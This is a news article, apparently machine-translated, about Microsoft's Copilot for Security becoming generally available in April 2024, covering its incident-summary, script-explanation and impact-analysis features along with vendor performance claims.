Microsoft has announced that its AI security assistant, Copilot for Security, will be generally available starting April 1, 2024, promising to streamline the workflows of cyber professionals.
The wizard will help security analysts triage, classify and remediate cyber incidents and is integrated across Microsoft's security portfolio.
Copilot for Security offers incident summary features that prevent analysts from getting bogged down in time-consuming documentation steps.
During a conference call, Andrew Conway, Microsoft's vice president of security marketing, said that, like developers, security analysts tend not to enjoy mundane tasks like generating summaries and reports because they take them away from a high-level job. more stimulating research.
Microsoft claims that Copilot for Security can perform these documentation tasks 46% faster than its human counterparts, and with greater accuracy too.
Another problem for security analysts, especially those who are less experienced, is manually reverse engineering malicious scripts. Threat actors often confuse the scripts used in their attacks to hide their tactics, techniques, and intentions.
Typically, threat analysts would manually reverse engineer the obfuscated script to understand how the attack works, but with talent shortages affecting security teams around the world, it is difficult to find personnel who can do this reliably. effective and efficient, the company said.
Meanwhile, Copilot for Security can translate the code and provide a natural language explanation for the entire script, breaking down what each individual piece of code does.
Microsoft hopes the tool can help companies address their skills shortage issues by giving less experienced junior analysts actionable insights into an individual script, without the arduous manual process of reverse engineering.
Mario Ferket, CISO at chemical company Dow, said he has seen improvements in the time it takes junior analysts to “get up to speed” when testing the safety co-pilot.
“We recently hired some junior analysts and what we've seen is that to get those people up to speed, with Copilot, the speed is tremendous,” he explained.
“If you want to create a complex KQL script, you can now use natural language. “This levels the playing field because, in the past, junior analysts would have needed help from senior analysts to do that type of work.”
Copilot for Security will help take the lead from threat actors
The assistant also uses AI-based analytics to assess the potential scope of security incidents. The system will provide a holistic impact analysis with information on the specific systems affected by an attack.
Security professionals will be able to generate impact analyzes for each individual incident, as well as receive practical step-by-step guidance on how they should respond to an attack, including support in classification, containment and remediation.
Additionally, Microsoft will also allow customers to create and save their own natural language messages for their most frequent workflows.
In its testing, Microsoft found that experienced security analysts using Copilot were 22% faster at common security tasks, while increasing their accuracy by 7%.
Additionally, 97% of experienced security analysts said they wanted to use Copilot again, and Microsoft highlighted the fact that AI has the potential to not only improve an individual's job, but also their job satisfaction by taking care of many tasks. of mundane tasks that might normally frustrate them.
With Copilot for Security, Microsoft has demonstrated its confidence in the ability of AI to bring measurable improvements to security operations in companies around the world.
Conway said he believes AI is starting to turn the tables on threat actors, allowing them to take the lead from attackers in the digital arms race.
“Security has become the most serious use case for AI right now… “organizations have traditionally faced a disadvantage against threat actors, but now they can use AI to gain the advantage.”